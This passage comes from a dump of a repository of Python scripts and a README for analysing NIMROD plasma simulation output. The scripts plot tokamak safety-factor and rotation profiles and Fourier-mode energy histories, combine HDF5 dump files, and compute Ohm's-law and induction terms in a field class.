omega[files[findex]][jj]=tf[11]\n kpol[files[findex]][jj]=tf[12]\n Dm[files[findex]][jj]=tf[13]\n Dr[files[findex]][jj]=tf[14]\n \n jj=jj+1\n\n f.close()\n\nprint(index[files[0]][:])\n\nfor i in range(len(qg[files[0]])):\n mid2=(qg[files[0]][i]+2.)*(qg[files[0]][i+1]+2.)\n if mid2<0:\n irho2=i\n mid3=(qg[files[0]][i]+3.)*(qg[files[0]][i+1]+3.)\n if mid3<0:\n irho3=i\n mid4=(qg[files[0]][i]+4.)*(qg[files[0]][i+1]+4.)\n if mid4<0:\n irho4=i\n break\n\n\nif plotprofs:\n fig1,ax1=plt.subplots(1,2,figsize=(16,5))\n\n plt.locator_params(axis='y',nbins=4)\n\n plt.setp(ax1[0].get_xticklabels(), fontsize=20)\n plt.setp(ax1[0].get_yticklabels(), fontsize=20)\n 
ax1[0].plot(psin[files[0]][:],abs(qg[files[0]][:]),'b',label=r'$abs(q)$',lw=3,color='r')\n ax1[0].axvline(x=psin[files[0]][irho2],lw=3,color='g',ls='dashed',label=r'$q=2$')\n ax1[0].axvline(x=psin[files[0]][irho3],lw=3,color='m',ls='dashed',label=r'$q=3$')\n ax1[0].axvline(x=psin[files[0]][irho4],lw=3,color='orange',ls='dashed',label=r'$q=4$')\n\n\n ax1[0].axhline(y=1,lw=2,ls='dotted',color='k')\n\n\n ax1[0].legend(fontsize=15,loc=2,ncol=2)\n\n ax1[0].set_ylim(-5.0,5)\n\n plt.setp(ax1[1].get_xticklabels(), fontsize=20)\n plt.setp(ax1[1].get_yticklabels(), fontsize=20)\n #sca=np.amax([abs(br1[:,13]),abs(bpi1[:,13]),abs(bbi1[:,13])])\n ax1[1].axvline(x=psin[files[0]][irho2],lw=3,color='g',ls='dashed',label=r'$q=2$')\n ax1[1].axvline(x=psin[files[0]][irho3],lw=3,color='m',ls='dashed',label=r'$q=3$')\n ax1[1].axvline(x=psin[files[0]][irho4],lw=3,color='orange',ls='dashed',label=r'$q=4$')\n\n ax1[1].plot(psin[files[0]][:],omega[files[0]][:],'b',label=r'$\\Omega$',lw=5,color='b')\n\n\n ax1[1].axhline(y=0,lw=2,ls='dotted',color='k')\n\n ax1[1].yaxis.major.formatter._useMathText = True\n ax1[1].ticklabel_format(axis='y', style='sci', scilimits=(-2,-2))\n ax1[1].yaxis.offsetText.set_fontsize(18)\n ax1[1].tick_params(axis='y',labelsize=20)\n\n\n #ax.set_xlim(0.6,0.8)\n #ax.set_ylim(-1,0.25)\n #ax.legend(loc=2,prop={'size':8})\n #plt.axvline(x=rs, color='k')\n ax1[0].set_xlabel(r'$\\rho$',fontsize=26)\n ax1[1].set_xlabel(r'$\\rho$',fontsize=26)\n ax1[1].set_ylabel(r'$\\Omega_{E\\times B}$',fontsize=26)\n\n #plt.savefig('fgprofs2.png',bbox_inches='tight')\n\n\n plt.show()\n\n\n fig1=plt.figure(figsize=(12,12))\n #plt.subplots_adjust(left=0.10, bottom=0.12, right=0.95, top=0.92, wspace=0.175)\n ax=fig1.add_subplot(331)\n plt.title(r'$f$ v. $\\rho$',fontsize=titlef)\n plt.setp(ax.get_xticklabels(), fontsize=tickf)\n plt.setp(ax.get_yticklabels(), fontsize=tickf)\n #sca=np.amax([abs(br1[:,13]),abs(bpi1[:,13]),abs(bbi1[:,13])])\n ax.plot(psin[files[0]][:],psin[files[0]][:],'b',label=r'$f$')\n #ax.set_xlim(0.6,0.8)\n #ax.set_ylim(-1,0.25)\n #ax.legend(loc=2,prop={'size':8})\n #plt.axvline(x=rs, color='k')\n ax.set_ylabel(r'$f$',fontsize=largef)\n ax.set_xlabel(r'$\\rho$',fontsize=largef)\n\n ax=fig1.add_subplot(332)\n plt.title(r'$\\mu_0 p$ v. $\\rho$',fontsize=titlef)\n plt.setp(ax.get_xticklabels(), fontsize=tickf)\n plt.setp(ax.get_yticklabels(), fontsize=tickf)\n #sca=np.amax([abs(br1[:,13]),abs(bpi1[:,13]),abs(bbi1[:,13])])\n ax.plot(psin[files[0]][:],nd[files[0]][:],'b',label=r'$\\mu_0p$')\n #ax.set_xlim(0.6,0.8)\n #ax.set_ylim(-1,0.25)\n #ax.legend(loc=2,prop={'size':8})\n #plt.axvline(x=rs, color='k')\n ax.set_ylabel(r'$mu_0p$',fontsize=largef)\n ax.set_xlabel(r'$\\rho$',fontsize=largef)\n\n ax=fig1.add_subplot(333)\n plt.title(r'$q$ v. $\\rho$',fontsize=titlef)\n plt.setp(ax.get_xticklabels(), fontsize=tickf)\n plt.setp(ax.get_yticklabels(), fontsize=tickf)\n #sca=np.amax([abs(br1[:,13]),abs(bpi1[:,13]),abs(bbi1[:,13])])\n ax.plot(psin[files[0]][:],qg[files[0]][:],'b',label=r'$q$')\n ax.axvline(x=psin[files[0]][irho2],color='g')\n ax.axvline(x=psin[files[0]][irho3],color='m')\n ax.axvline(x=psin[files[0]][irho4],color='orange')\n #ax.set_xlim(0.6,0.8)\n #ax.set_ylim(-1,0.25)\n #ax.legend(loc=2,prop={'size':8})\n #plt.axvline(x=rs, color='k')\n ax.set_ylabel(r'$q$',fontsize=largef)\n ax.set_xlabel(r'$\\rho$',fontsize=largef)\n\n ax=fig1.add_subplot(334)\n plt.title(r'$Mach$ v. 
$\\rho$',fontsize=titlef)\n plt.setp(ax.get_xticklabels(), fontsize=tickf)\n plt.setp(ax.get_yticklabels(), fontsize=tickf)\n #sca=np.amax([abs(br1[:,13]),abs(bpi1[:,13]),abs(bbi1[:,13])])\n ax.plot(psin[files[0]][:],mach[files[0]][:],'b',label=r'${\\rm Mach}$')\n #ax.set_xlim(0.6,0.8)\n #ax.set_ylim(-1,0.25)\n #ax.legend(loc=2,prop={'size':8})\n #plt.axvline(x=rs, color='k')\n ax.set_ylabel(r'${\\rm Mach}$',fontsize=largef)\n ax.set_xlabel(r'$\\rho$',fontsize=largef)\n\n ax=fig1.add_subplot(335)\n plt.title(r'$\\Omega_{E\\times B}$ v. $\\rho$',fontsize=titlef)\n plt.setp(ax.get_xticklabels(), fontsize=tickf)\n plt.setp(ax.get_yticklabels(), fontsize=tickf)\n #sca=np.amax([abs(br1[:,13]),abs(bpi1[:,13]),abs(bbi1[:,13])])\n ax.plot(psin[files[0]][:],omgeb[files[0]][:],'b',label=r'$\\Omega_{E\\times B}$ v. $\\rho$')\n #ax.set_xlim(0.6,0.8)\n #ax.set_ylim(-1,0.25)\n #ax.legend(loc=2,prop={'size':8})\n #plt.axvline(x=rs, color='k')\n ax.set_ylabel(r'$\\Omega_{E\\times B}$',fontsize=largef)\n ax.set_xlabel(r'$\\rho$',fontsize=largef)\n\n ax=fig1.add_subplot(336)\n plt.title(r'$\\Omega_{\\nabla P}$ v. $\\rho$',fontsize=titlef)\n plt.setp(ax.get_xticklabels(), fontsize=tickf)\n plt.setp(ax.get_yticklabels(), fontsize=tickf)\n #sca=np.amax([abs(br1[:,13]),abs(bpi1[:,13]),abs(bbi1[:,13])])\n ax.plot(psin[files[0]][:],omgp[files[0]][:],'b',label=r'${\\rm Mach}$')\n #ax.set_xlim(0.6,0.8)\n #ax.set_ylim(-1,0.25)\n #ax.legend(loc=2,prop={'size':8})\n #plt.axvline(x=rs, color='k')\n ax.set_ylabel(r'$\\Omega_{\\nabla P}$',fontsize=largef)\n ax.set_xlabel(r'$\\rho$',fontsize=largef)\n\n ax=fig1.add_subplot(337)\n plt.title(r'$n$ v. $\\rho$',fontsize=titlef)\n plt.setp(ax.get_xticklabels(), fontsize=tickf)\n plt.setp(ax.get_yticklabels(), fontsize=tickf)\n #sca=np.amax([abs(br1[:,13]),abs(bpi1[:,13]),abs(bbi1[:,13])])\n ax.plot(psin[files[0]][:],n_den[files[0]][:],'b',label=r'$q$')\n #ax.set_xlim(0.6,0.8)\n #ax.set_ylim(-1,0.25)\n #ax.legend(loc=2,prop={'size':8})\n #plt.axvline(x=rs, color='k')\n ax.set_ylabel(r'$n$',fontsize=largef)\n ax.set_xlabel(r'$\\rho$',fontsize=largef)\n\n ax=fig1.add_subplot(338)\n plt.title(r'$ln(Residual)$ v. 
$\\rho$',fontsize=titlef)\n plt.setp(ax.get_xticklabels(), fontsize=tickf)\n plt.setp(ax.get_yticklabels(), fontsize=tickf)\n #sca=np.amax([abs(br1[:,13]),abs(bpi1[:,13]),abs(bbi1[:,13])])\n ax.plot(psin[files[0]][:],ne[files[0]][:],'b',label=r'$q$')\n #ax.set_xlim(0.6,0.8)\n #ax.set_ylim(-1,0.25)\n #ax.legend(loc=2,prop={'size':8})\n #plt.axvline(x=rs, color='k')\n ax.set_ylabel(r'$ln(Residual)$',fontsize=largef)\n ax.set_xlabel(r'$\\rho$',fontsize=largef)\n\n #plt.savefig('fgprofs1.png',bbox_inches='tight')\n\n plt.show()\n" }, { "alpha_fraction": 0.5755943059921265, "alphanum_fraction": 0.6396196484565735, "avg_line_length": 30.86868667602539, "blob_id": "ee323f31df427da30ca4e1c7d487af6b88f8d366", "content_id": "bf883b5f5d505da44dcd94fdd48a8a7b4f8aed40", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3155, "license_type": "no_license", "max_line_length": 109, "num_lines": 99, "path": "/plotingScripts/drawlogen.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/local/bin/python3\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport math as m\n\ndata = np.loadtxt('/home/research/ehowell/SCRATCH/166439/03300_2_fl/19091702/lphi5_nolinear_fresh/logen.txt')\n\nprint (data.shape)\nvals = data.shape\n#print vals[0]\nfmode =11\nlenl=int(vals[0]/fmode)\ntime = np.zeros(int(vals[0]/fmode),dtype='float')\nlogme = np.zeros((fmode, int(vals[0]/fmode)),dtype='float')\nlogke = np.zeros((fmode, int(vals[0]/fmode)),dtype='float')\nme = np.zeros((fmode, int(vals[0]/fmode)),dtype='float')\nke = np.zeros((fmode, int(vals[0]/fmode)),dtype='float')\n\n\nfor ii in range(0,lenl):\n time[ii] = data[ii*fmode,1]*1000000\n for jj in range(0,fmode):\n logme[jj,ii]=data[ii*fmode+jj,4]\n logke[jj,ii]=data[ii*fmode+jj,5]\n me[jj,ii]=m.pow(10,data[ii*fmode+jj,4])\n ke[jj,ii]=m.pow(10,data[ii*fmode+jj,5])\n \n\n\n\nfig=plt.figure(figsize=(10,4))\n#fig.subplots_adjust(left=0.5)\n#ax.yaxis.labelpad=35\nax = fig.add_subplot(121)\n#ax.plot(time,logme[0,:],ls='-.',label='n=0')\nax.plot(time,logme[1,:],ls='-',label='n=1')\nax.plot(time,logme[2,:],ls=':',label='n=2')\nax.plot(time,logme[3,:],ls=':',label='n=3')\nax.plot(time,logme[4,:],ls='-',label='n=4')\nax.plot(time,logme[5,:],ls='-.',label='n=5')\nax.plot(time,logme[6,:],ls='-',label='n=6')\nax.plot(time,logme[7,:],ls=':',label='n=7')\nax.plot(time,logme[8,:],ls=':',label='n=8')\nax.plot(time,logme[9,:],ls='-',label='n=9')\nax.plot(time,logme[10,:],ls='-.')\nax.set_ylabel(r\"Log Energy\", size=16)\nax.set_xlabel(r\"Time($\\mu$s)\",size=16)\n#plt.legend(ncol=2, loc=4)\n#ax.set_xlim([0.0,0.5])\nax.set_ylim([-1,2])\n#ax.yaxis.labelpad=35\nplt.title(r'Magnetic Energy', size=16)\nax = fig.add_subplot(122)\n#ax.plot(time,logke[0,:],ls='-.',label='n=0')\nax.plot(time,logke[1,:],ls='-',label='n=1')\nax.plot(time,logke[2,:],ls=':',label='n=2')\nax.plot(time,logke[3,:],ls=':',label='n=3')\nax.plot(time,logke[4,:],ls='-',label='n=4')\nax.plot(time,logke[5,:],ls='-.',label='n=5')\nax.plot(time,logke[6,:],ls='-',label='n=6')\nax.plot(time,logke[7,:],ls=':', label='n=7')\nax.plot(time,logke[8,:],ls=':', label='n=8')\nax.plot(time,logke[9,:],ls='-',label='n=9')\nax.plot(time,logke[10,:],ls='-.')\nax.set_ylabel(r\"Log Energy\", size=16)\nax.set_xlabel(r\"Time($\\mu$s)\",size=16)\n#ax.set_xlim([0.0,0.5])\nax.set_ylim([-3.0,1])\nplt.legend(ncol=3, loc=4, columnspacing =1,prop={'size':12})\n#ax.yaxis.labelpad=35\nplt.title(r'Kinetic Energy', 
size=16)\nplt.tight_layout()\n#ax.legend(loc=2)\nplt.show()\n\nfig=plt.figure(figsize=(10,4))\n#fig.subplots_adjust(left=0.5)\n#ax.yaxis.labelpad=35\nax = fig.add_subplot(121)\nax.plot(time,me[0,:],ls='-.',label='n=0')\nax.set_ylabel(r\"Energy\", size=16)\nax.set_xlabel(r\"Time($\\mu$s)\",size=16)\n#plt.legend(ncol=2, loc=4)\n#ax.set_xlim([0.0,0.5])\n#ax.set_ylim([-1,2])\n#ax.yaxis.labelpad=35\nplt.title(r'Magnetic Energy', size=16)\nax = fig.add_subplot(122)\nax.plot(time[1:],ke[0,1:],ls='-.',label='n=0')\nax.set_ylabel(r\"Energy\", size=16)\nax.set_xlabel(r\"Time($\\mu$s)\",size=16)\n#ax.set_xlim([0.0,0.5])\n#ax.set_ylim([4.14,4.16])\nplt.legend(ncol=3, loc=1, columnspacing =1,prop={'size':12})\n#ax.yaxis.labelpad=35\nplt.title(r'Kinetic Energy', size=16)\nplt.tight_layout()\n#ax.legend(loc=2)\nplt.show()\n" }, { "alpha_fraction": 0.6749379634857178, "alphanum_fraction": 0.6885855793952942, "avg_line_length": 27.821428298950195, "blob_id": "acee85cce7634d43e286e5cea75d96809aab3a0b", "content_id": "6ae1c6a95f30e396393a581624f2060d34b19433", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 806, "license_type": "no_license", "max_line_length": 87, "num_lines": 28, "path": "/combineDump/README.md", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "# combineDump\nThese scripts combine dumpfiles with multiple Fourier modes, into one larger dump file.\n## Inputs:\n - nimrod h5 dump with each perturbation\n## Outputs:\n - dumpgll.00000.h5 with all perturbations\n\n## Key Steps:\n - Read dump files\n - Combine Fourier modes\n - Write new h5 dump files\n\n## Status: \n - Code runs and works for 2 dumps files with 1 mode each\n - Needs more testing\n - Slow\n\n## Todo:\n - [x] Make sure I have h5 py\n - [x] Write dumpTime\n - [x] Combine and write keff\n - [x] Write seams\n - [x] Write file attributes\n - [x] Combine and write rblocks\n - [x] Write code to combine two dumpfiles\n - [x] Test the output with one fourier mode in each dump file \n - [ ] Test the output with multiple fourier mode in a dump file \n - [ ] Speed up copy (can I avoid the looping)" }, { "alpha_fraction": 0.5278750658035278, "alphanum_fraction": 0.5507836937904358, "avg_line_length": 35.74472427368164, "blob_id": "26d9fe7ffce2cd1badc30015d8ea21a0f3c0e554", "content_id": "f78e7872a5adf7310e0ba6fe9d5ea0ac906a36f7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 17417, "license_type": "no_license", "max_line_length": 118, "num_lines": 474, "path": "/ntmscripts/ntm_fields.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n\nimport f90nml\nimport eval_nimrod as eval\nimport field_class as fc\nimport numpy as np\nfrom scipy.fft import fft, ifft\nimport plot_nimrod as pn\nimport matplotlib.pyplot as plt\nimport time\nimport nim_timer as timer\n\nclass ntmfields:\n ''' ntm fields is a class for reading/storing nimrod data on a mesh\n it also calculates the different terms in nimrods field advances\n this seperates the evaulation of these fields from fsa interation\n or plotting on various meshs\n '''\n\n def __init__(self,dumpfile,nimrodin):\n self.dumpfile=dumpfile\n self.nimrodin=nimrodin\n self.eval=None\n self.grid=None\n self.fielddict={}\n self.ndict={}\n self.edict={}\n self.evalb_timer=0.0\n self.fft_timer=0.0\n self.ndmode=0\n self.neq=False\n self.npert=False\n self.vdmode=0\n self.veq=False\n self.vpert=False\n self.diff_dmode=0\n\n 
if self.nimrodin is not None:\n self.nml=f90nml.read(self.nimrodin)\n self.grid_nml=self.nml.get('grid_input',{})\n self.equil_nml=self.nml.get('equil_input',{})\n self.const_nml=self.nml.get('const_input',{})\n self.physics_nml=self.nml.get('physics_input',{})\n self.closure_nml=self.nml.get('closure_input',{})\n self.solver_nml=self.nml.get('solver_input',{})\n self.output_nml=self.nml.get('output_input',{})\n self.set_physical_constants()\n self.set_evalnimrod()\n return None\n\n def set_physical_constants(self):\n '''\n Read namelists and set physical constants\n '''\n self.mu0=self.const_nml.get('mu0_input',np.pi*4.0e-7)\n self.me=self.const_nml.get('me_input',9.1093898e-31)\n self.mi=self.const_nml.get('mi_input',3.3435860e-27)\n self.zeff=self.const_nml.get('zeff_input',1.0)\n self.qe=self.const_nml.get('chrg_input',1.60217733e-19)\n self.gamma=self.const_nml.get('gam_input',5./3.)\n self.kblz=self.const_nml.get('kblz_input',1.60217733e-19)\n self.clight=self.const_nml.get('c_input',2.99792458e8)\n return None\n\n def set_evalnimrod(self):\n '''\n Set Eval Nimrod\n '''\n if self.eval is None:\n self.eval=eval.EvalNimrod(self.dumpfile,fieldlist='nvbtjpd')\n return None\n\n def get_gridrzp(self,grid):\n '''\n returns grid and rzp, and grid for a given grid\n if grid=None, try self.grid\n elif grid is an EvalGrid insatnace\n else np grid\n '''\n if grid is None:\n if self.grid is None:\n print(\"ntm_fields_grid is not set\")\n raise ValueError\n else:\n grid=self.grid\n rzp=self.grid.rzp\n elif isinstance(grid,eval.EvalGrid):\n rzp=grid.rzp\n else:\n rzp=grid\n return grid,rzp\n\n @timer.timer_func\n def fft(self,pert,axis=-1):\n ''' NIMROD stores it's field data as f(phi) = sum_{-n}^n f_n exp(inphi)\n This implies that the normalization 1/N should be done in the transform\n from physical space to fourier space\n This is the one option that scipi.fft does not support, but why?\n '''\n fpert = fft(pert.data,axis=axis,norm=None)/pert.data.shape[axis]\n return fpert\n\n def set_method(self,method):\n if method == \"induction\":\n self.ndmode=1\n self.neq=True\n self.npert=False\n self.vdmode=1\n self.veq=True\n self.vpert=True\n self.diff_dmode=1\n\n @timer.timer_func\n def eval_symm(self,fname,rzp,dmode,eq):\n if eq not in [1,3]:\n print(\"eval_symm only works for eq=1 or 3\")\n raise ValueError\n newrzp=rzp[:,0]\n field=self.eval.eval_field(fname,newrzp,dmode=dmode,eq=eq)\n field=field.reshape(*field.shape,1)\n field=np.broadcast_to(field,(field.shape[0],rzp.shape[1]))\n return field\n\n @timer.timer_func\n def eval_n(self,grid=None,fft=False):\n grid,rzp=self.get_gridrzp(grid)\n if self.neq:\n if len(rzp.shape)==2:\n field=self.eval_symm('n',rzp,dmode=self.ndmode,eq=1)\n self.fielddict['neq']=fc.Scalar(field,rzp,self.ndmode,True)\n else:\n field=self.eval.eval_field('n', grid, dmode=self.ndmode, eq=1)\n self.fielddict['neq']=fc.Scalar(field,rzp,self.ndmode,True)\n if self.npert:\n field=self.eval.eval_field('n', grid, dmode=self.ndmode, eq=0)\n self.fielddict['npert']=fc.Scalar(field,rzp,self.ndmode,True)\n if fft:\n self.fielddict['nfour']=self.fft(field)\n return None\n\n @timer.timer_func\n def eval_v(self,grid=None,fft=False):\n grid,rzp=self.get_gridrzp(grid)\n if self.veq:\n if len(rzp.shape)==2:\n field=self.eval_symm('v',rzp,dmode=self.vdmode,eq=1)\n self.fielddict['veq']=fc.Vector(field,rzp,self.vdmode,True)\n else:\n field=self.eval.eval_field('v', grid, dmode=self.vdmode,eq=1)\n self.fielddict['veq']=fc.Vector(field,rzp,self.vdmode,True)\n if self.vpert:\n 
field=self.eval.eval_field('v', grid, dmode=self.vdmode, eq=0)\n self.fielddict['vpert']=fc.Vector(field,rzp,self.vdmode,True)\n if fft:\n self.fielddict['vfour']=self.fft(field)\n return None\n\n @timer.timer_func\n def eval_b(self,grid=None,fft=False):\n grid,rzp=self.get_gridrzp(grid)\n if len(rzp.shape)==2:\n field=self.eval_symm('b',rzp,dmode=1,eq=1)\n self.fielddict['beq']=fc.Vector(field,rzp,1,True)\n field=self.eval_symm('b',rzp,dmode=1,eq=3)\n self.fielddict['b0']=fc.Vector(field,rzp,1,True)\n else:\n field=self.eval.eval_field('b',grid,dmode=1,eq=1)\n self.fielddict['beq']=fc.Vector(field,rzp,1,True)\n field=self.eval.eval_field('b',grid,dmode=1,eq=3)\n self.fielddict['b0']=fc.Vector(field,rzp,1,True)\n\n field=self.eval.eval_field('b',grid,dmode=1, eq=0)\n self.fielddict['bpert']=fc.Vector(field,rzp,1,True)\n if fft:\n self.fielddict['bfour']=self.fft(field)\n return None\n\n @timer.timer_func\n def eval_fsa_beq2(self,grid=None):\n grid,rzp=self.get_gridrzp(grid)\n self.dump_fsa_beq2 =self.output_nml.get('dump_fsa_beq2',False)\n if self.dump_fsa_beq2:\n if len(rzp.shape)==2:\n field=self.eval_symm('fsa_beq2', grid, dmode=1, eq=1)\n self.fielddict['fsa_beq2']=fc.Scalar(field,rzp,1,True)\n else:\n field=self.eval.eval_field('fsa_beq2', grid, dmode=1, eq=1)\n self.fielddict['fsa_beq2']=fc.Scalar(field,rzp,1,True)\n else:\n self.fielddict['fsa_beq2']=0.0\n return None\n\n @timer.timer_func\n def eval_j(self,grid=None,fft=False):\n grid,rzp=self.get_gridrzp(grid)\n if len(rzp.shape)==2:\n field=self.eval_symm('j',rzp,dmode=1,eq=1)\n self.fielddict['jeq']=fc.Vector(field,rzp,1,True)\n else:\n field=self.eval.eval_field('j', grid, dmode=1, eq=1)\n self.fielddict['jeq']=fc.Vector(field,rzp,1,True)\n field=self.eval.eval_field('j', grid, dmode=1, eq=0)\n self.fielddict['jpert']=fc.Vector(field,rzp,1,True)\n if fft:\n self.fielddict['jfour']=self.fft(field)\n return None\n\n @timer.timer_func\n def eval_neo_mask(self,grid=None):\n grid,rzp=self.get_gridrzp(grid)\n r0=self.closure_nml.get('neo_axis_r',0)\n z0=self.closure_nml.get('neo_axis_z',0)\n rbump=self.closure_nml.get('neo_bump_r0',1.0)\n shape=list(rzp.shape)\n shape[0]=4\n fval=np.zeros(shape)\n fval[0]=1.0\n r2=(np.power(rzp[0]-r0,2)+np.power(rzp[1]-z0,2))/rbump**2\n if isinstance(r2,np.float):\n if r2<1.0:\n #check\n bump=np.exp(1-1./(1.-r2))\n dbumpdr2=-r2/(1-r2)**3\n dr2dx=2*(rzp[0]-r0)/rbump**2\n dr2dz=2*(rzp[1]-r0)/rbump**2\n d2r2dxx=2/rbump**2\n d2r2dyy=2/rbump**2\n d2r2dxy=0.0\n #print(type(bump),type(dbumpdr2),type(dr2dx))\n #print(dbumpdr2.shape)\n fval[0]=1.0-bump\n fval[1]=-bump*dbumpdr2*dr2dx\n fval[2]=-bump*dbumpdr2*dr2dz\n else:\n result=np.where(r2<1.0)\n for indicies in zip(*result):\n #check\n bump=np.exp(1-1./(1.-r2[indicies]))\n dbumpdr2=-r2[indicies]/(1-r2[indicies])**3\n dr2dx=2*(rzp[(0,)+indicies]-r0)/rbump**2\n dr2dz=2*(rzp[(1,)+indicies]-r0)/rbump**2\n d2r2dxx=2/rbump**2\n d2r2dyy=2/rbump**2\n d2r2dxy=0.0\n #print(type(bump),type(dbumpdr2),type(dr2dx))\n #print(dbumpdr2.shape)\n fval[(0,)+indicies]=1.0-bump\n fval[(1,)+indicies]=-bump*dbumpdr2*dr2dx\n fval[(2,)+indicies]=-bump*dbumpdr2*dr2dz\n return fc.Scalar(fval,rzp,1,True)\n\n @timer.timer_func\n def eval_p(self,grid=None):\n grid,rzp=self.get_gridrzp(grid)\n if len(rzp.shape)==2:\n field=self.eval_symm('p',rzp,dmode=2,eq=1)\n self.fielddict['peq']=fc.Scalar(field,rzp,2,True)\n else:\n field=self.eval.eval_field('p',grid,dmode=2,eq=1)\n self.fielddict['peq']=fc.Scalar(field,rzp,2,True)\n field=self.eval.eval_field('p',grid,dmode=2,eq=0)\n 
self.fielddict['ppert']=fc.Scalar(field,rzp,2,True)\n self.fielddict['pfour']=self.fft(field)\n return None\n\n @timer.timer_func\n def eval_diff(self,grid=None):\n ''' Get the diff shape scalars from eval nimrod\n Some extralogic is needed to pull apart the different\n diff shape scalar fields from the output of eval_field\n note when ds_nqty>1\n elecd_diff is 0\n iso_visc_diff is 1\n '''\n diff_dmode=self.diff_dmode\n grid,rzp=self.get_gridrzp(grid)\n self.ds_nqty = self.equil_nml.get('ds_nqty',1)\n if len(rzp.shape)==2:\n field=self.eval_symm('d',rzp,dmode=diff_dmode,eq=1)\n else:\n field=self.eval.eval_field('d',grid,dmode=diff_dmode, eq=1)\n diff_shape=[]\n ishape=list(field.shape)\n ishape[0]=ishape[0]//self.ds_nqty\n ifield= np.zeros(ishape)\n for ii in range(self.ds_nqty):\n ifield[0] = field[ii]\n if diff_dmode>0:\n start=self.ds_nqty+ii*3\n end=start+3\n ifield[1:4]=field[start:end]\n if diff_dmode>1:\n start=self.ds_nqty*4+ii*6\n end=start+6\n ifield[4:10]=field[start:end]\n diff_shape.append(fc.Scalar(ifield,rzp,diff_dmode,True))\n self.fielddict['diff_shape']=diff_shape\n return None\n\n #begin coding of field equations\n def continuity(self,grid=None):\n if not 'neq' in self.fielddict:\n self.eval_n(grid)\n if not 'veq' in self.fielddict:\n self.eval_v(grid)\n\n nddiff = self.physics_nml.get('nd_diff',0.0)\n veq=self.fielddict['veq']\n vpert=self.fielddict['vpert']\n neq=self.fielddict['neq']\n npert=self.fielddict['npert']\n\n advecteq=veq.dot(neq.grad())\n advectlin=veq.dot(npert.grad())+vpert.dot(neq.grad())\n advectnon=vpert.dot(npert.grad())\n compeq=veq.div()*neq\n #todo add linear and nonlinear compresson\n nddiffusion=(nddiff*npert.grad()).div()\n self.ndict['advecteq']=advecteq\n self.ndict['advectlin']=advectlin\n self.ndict['advectnon']=advectnon\n self.ndict['dompeq']=compeq\n self.ndict['lindiff']=nddiffusion\n return None\n\n def momentum(self,grid=None):\n #todo\n pass\n\n def temperature(self,grid=None):\n #todo\n pass\n\n @timer.timer_func\n def ohms(self,grid=None):\n grid,rzp=self.get_gridrzp(grid)\n self.edict={}\n ohmslaw=self.physics_nml.get('ohms','mhd')\n neoe_flag = self.closure_nml.get('neoe_flag',None)\n mu_e=self.closure_nml.get('mu_e',0.0)\n try:\n self.elecd=self.physics_nml.get('elecd',0.0)\n if isinstance(self.elecd,(np.ndarray,list)):\n self.elecd=self.elecd[0]\n except:\n print(\"Can't read elecd from nimrod.in\")\n raise KeyError\n\n if 'veq' not in self.fielddict:\n self.eval_v(grid)\n if 'beq' not in self.fielddict:\n self.eval_b(grid)\n if 'jeq' not in self.fielddict:\n self.eval_j(grid)\n if 'diff_shape' not in self.fielddict:\n self.eval_diff(grid)\n veq=self.fielddict['veq']\n vpert=self.fielddict['vpert']\n beq=self.fielddict['beq']\n bpert=self.fielddict['bpert']\n jeq=self.fielddict['jeq']\n jpert=self.fielddict['jpert']\n diff_shape=self.fielddict['diff_shape']\n\n do_eq=False\n if do_eq:\n veqbeq=-veq.cross(beq)\n etajeq=self.mu0*self.elecd*diff_shape[0]*jeq\n self.edict['veqbeq']=veqbeq\n self.edict['etajeq']=etajeq\n\n vpbeq=-vpert.cross(beq)\n veqbp=-veq.cross(bpert)\n vpbp=-vpert.cross(bpert)\n etajpert=self.mu0*self.elecd*diff_shape[0]*jpert\n self.edict['vpbeq']=vpbeq\n self.edict['veqbp']=veqbp\n self.edict['vpbp']=vpbp\n self.edict['etajpert']=etajpert\n\n if ohmslaw in ['mhd&hall','2fl']:\n #TODO\n print(\"Hall and two fluid Ohms law are not yet supported\")\n raise ValueError\n if 'neq' not in self.fielddict:\n self.eval_n(grid)\n if 'peq' not in self.fielddict:\n self.eval_p(grid)\n neq=self.fielddict['neq']\n 
npert=self.fielddict['npert']\n\n\n\n if neoe_flag in ['gianakon']:\n if 'neq' not in self.fielddict:\n self.eval_n(grid)\n if 'fsa_beq2' not in self.fielddict:\n self.eval_fsa_beq2(grid)\n neq=self.fielddict['neq']\n fsa_beq2=self.fielddict['fsa_beq2']\n\n ephi=[0,0,1]\n etor=fc.basis_vector('p',rzp,torgeom=True)\n bep=beq-beq.dot(etor)*etor\n neo_mask=self.eval_neo_mask(grid)\n coef=self.me*mu_e/(self.qe**2)*neo_mask\n coef1=self.me*mu_e/(self.qe)*neo_mask\n #coef=neo_mask*mu_e\n\n divpie=coef/neq*fsa_beq2*(jpert.dot(bep))/(beq.dot(bep)**2+1.0e-8) * bep\n self.edict['divpie']=divpie\n\n divpie1=coef1*fsa_beq2*(jpert.dot(bep))/(beq.dot(bep)**2+1.0e-8) * bep\n self.edict['divpie1']=divpie1\n\n divpie0=coef/neq*fsa_beq2*(bep.mag())/(beq.dot(bep)**2+1.0e-8) * bep\n self.edict['divpie0']=divpie0\n\n divpieb=coef1*fsa_beq2*(bep.mag())/(beq.dot(bep)**2+1.0e-8) * bep\n self.edict['divpieb']=divpieb\n \n #pn.PlotNimrod.plot_scalar_plane(rzp[:,:,:,0], fsa_beq2.data[:,:,0])\n #pn.PlotNimrod.plot_scalar_plane(rzp[:,:,:,0], divpie.data[0,:,:,0])\n #pn.PlotNimrod.plot_scalar_plane(rzp[:,:,:,0], divpie.data[1,:,:,0])\n return None\n\n @timer.timer_func\n def induction(self,grid=None):\n self.ohms(grid)\n self.dbdtdict={}\n for key, value in self.edict.items():\n self.dbdtdict[key]=-value.curl()\n '''\n fig=plt.figure(figsize=(6,8))\n ax=fig.add_subplot(111)\n ax.set_aspect('equal')\n # levels = numpy.linspace(fmin, fmax, nlvls)\n levels = 50\n cf = ax.contourf(self.grid.rzp[0,:,:,0], self.grid.rzp[1,:,:,0], self.dbdtdict[key].data[0,:,:,0], levels)\n plt.colorbar(cf)\n plt.title(key)\n plt.tight_layout()\n plt.show()\n fig=plt.figure(figsize=(6,8))\n 